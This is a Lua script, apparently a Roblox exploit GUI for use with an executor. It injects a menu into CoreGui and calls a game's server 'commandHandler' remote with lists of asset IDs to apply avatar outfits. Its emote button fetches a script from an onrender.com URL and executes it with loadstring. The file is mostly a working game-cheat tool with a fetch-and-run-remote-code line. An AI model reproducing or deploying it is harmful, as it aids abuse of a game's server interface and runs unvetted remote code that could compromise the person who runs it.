local ScreenGui = Instance.new("ScreenGui", game.CoreGui)
local mainFrame = Instance.new("Frame", ScreenGui)
mainFrame.Size = UDim2.new(0, 420, 0, 320)
mainFrame.Position = UDim2.new(0.5, -210, 0.5, -160)
mainFrame.BackgroundColor3 = Color3.fromRGB(30,30,30)

local closeButton = Instance.new("TextButton", mainFrame)
closeButton.Size = UDim2.new(0, 24, 0, 24)
closeButton.Position = UDim2.new(1, -28, 0, 4)
closeButton.Text = "X"
closeButton.BackgroundColor3 = Color3.fromRGB(200,0,0)
closeButton.TextColor3 = Color3.fromRGB(255,255,255)
closeButton.TextScaled = true

local tabHolder = Instance.new("Frame", mainFrame)
tabHolder.Size = UDim2.new(0, 120, 1, -40)
tabHolder.Position = UDim2.new(0, 0, 0, 40)
tabHolder.BackgroundColor3 = Color3.fromRGB(40,40,40)

local contentFrame = Instance.new("Frame", mainFrame)
contentFrame.Size = UDim2.new(1, -130, 1, -40)
contentFrame.Position = UDim2.new(0, 130, 0, 40)
contentFrame.BackgroundColor3 = Color3.fromRGB(50,50,50)

local title = Instance.new("TextLabel", mainFrame)
title.Size = UDim2.new(1, -40, 0, 36)
title.Position = UDim2.new(0, 10, 0, 2)
title.BackgroundTransparency = 1
title.Text = "Jay Salon De Fiestas"
title.Font = Enum.Font.GothamBold
title.TextSize = 18
title.TextColor3 = Color3.fromRGB(255,255,255)
title.TextXAlignment = Enum.TextXAlignment.Left

local tabs = {"Ava Salon", "Emotes"}
local contentFrames = {}

for i, tabName in ipairs(tabs) do
    local tab = Instance.new("TextButton", tabHolder)
    tab.Size = UDim2.new(1, -10, 0, 36)
    tab.Position = UDim2.new(0, 5, 0, (i-1)*42)
    tab.BackgroundColor3 = Color3.fromRGB(60,60,60)
    tab.TextColor3 = Color3.fromRGB(255,255,255)
    tab.Font = Enum.Font.GothamBold
    tab.TextSize = 14
    tab.Text = tabName

    local frame = Instance.new("ScrollingFrame", contentFrame)
    frame.Size = UDim2.new(1, -10, 1, -10)
    frame.Position = UDim2.new(0, 5, 0, 5)
    frame.CanvasSize = UDim2.new(0,0,0,0)
    frame.ScrollBarThickness = 6
    frame.Visible = false
    frame.BackgroundColor3 = Color3.fromRGB(60,60,60)

    local listLayout = Instance.new("UIListLayout", frame)
    listLayout.Padding = UDim.new(0,6)
    listLayout.SortOrder = Enum.SortOrder.LayoutOrder

    contentFrames[tabName] = frame

    tab.MouseButton1Click:Connect(function()
        for _, f in pairs(contentFrames) do
            f.Visible = false
        end
        frame.Visible = true
    end)
end

local commandHandler = game:GetService("ReplicatedStorage")
    :WaitForChild("Connections")
    :WaitForChild("dataProviders")
    :WaitForChild("commandHandler")

local avatars = {
    ["Kalcer Black 🎮"] = {
        9490006586, 8826186815, 12875433848, 134082579, 752799, 134082579, 
        18584571584, 79982209691231, 18502512429, 10159600649, 113017919146885, 
        10974258909, 72626658173890, 97281363058134, 91506714964112, 13762586864,
        113838699792971, 93083358795770, 99786319172836, 137471119999383,
        127807886407195, 106792762881234, 113652671661901, 17524747751,
        114963203854760, 13352926142, 123912229513530, 14411367823,
        17307254292, 18538146480
    },
    ["Kalcer Putih 🥶🥶"] = {
        9490006586, 8826186815, 12875433848, 134082579, 752799, 12376159420,
        134082579, 18584571584, 87862158241725, 114445357985125, 102432812399809,
        115899217250614, 86232967776919, 114963203854760, 18201261220,
        81832503705847, 128800183457963, 103155472297560, 118363213536092,
        17196875081, 17524747751, 75612702275379, 13352926142, 140545114214307,
        70860127035502, 108482443527620, 99272648751352, 99786319172836,
        109900484336507, 103224430842613, 92565592431265, 18538146480,
        87862158241725
    },
    ["Black Baby"] = {
        752799, 9490006586, 8826186815, 12875433848, 134082579, 12376159420,
        18584571584, 82710644559337, 17196875081, 128800183457963,
        81832503705847, 93520131138422, 86773447250140, 118551913484195,
        17150164752, 107221904954874, 94009702395592, 14228725502,
        111895674111464, 116345324986540, 13352926142, 123912229513530,
        99272648751352, 99786319172836, 109900484336507, 92565592431265,
        103224430842613, 18538146480
    }
}

for name, ids in pairs(avatars) do
    local btn = Instance.new("TextButton", contentFrames["Ava Salon"])
    btn.Size = UDim2.new(1, -10, 0, 36)
    btn.BackgroundColor3 = Color3.fromRGB(80,80,80)
    btn.TextColor3 = Color3.fromRGB(255,255,255)
    btn.Font = Enum.Font.GothamBold
    btn.TextSize = 14
    btn.Text = name

    btn.MouseButton1Click:Connect(function()
        for i = 1, #ids, 4 do
            local group = {}
            for j = i, math.min(i+3, #ids) do
                table.insert(group, ids[j])
            end
            commandHandler:InvokeServer("hat", unpack(group))
            task.wait(0)
        end
    end)
end

local emoteBtn = Instance.new("TextButton", contentFrames["Emotes"])
emoteBtn.Size = UDim2.new(1, -10, 0, 36)
emoteBtn.BackgroundColor3 = Color3.fromRGB(80,80,80)
emoteBtn.TextColor3 = Color3.fromRGB(255,255,255)
emoteBtn.Font = Enum.Font.GothamBold
emoteBtn.TextSize = 14
emoteBtn.Text = "Load All Emotes"

emoteBtn.MouseButton1Click:Connect(function()
    loadstring(game:HttpGetAsync("https://mark-hub-h2g9.onrender.com/raw/Fe%20All%20Emotes.lua=446d7afc"))()
end)

closeButton.MouseButton1Click:Connect(function()
    mainFrame.Visible = false
end)

local iconButton = Instance.new("ImageButton", ScreenGui)
iconButton.Size = UDim2.new(0, 50, 0, 50)
iconButton.Position = UDim2.new(0, 20, 1, -70)
iconButton.BackgroundTransparency = 1
iconButton.Image = "rbxassetid://10511855986"
iconButton.Draggable = true

iconButton.MouseButton1Click:Connect(function()
    mainFrame.Visible = not mainFrame.Visible
end)

contentFrames["Ava Salon"].Visible = true
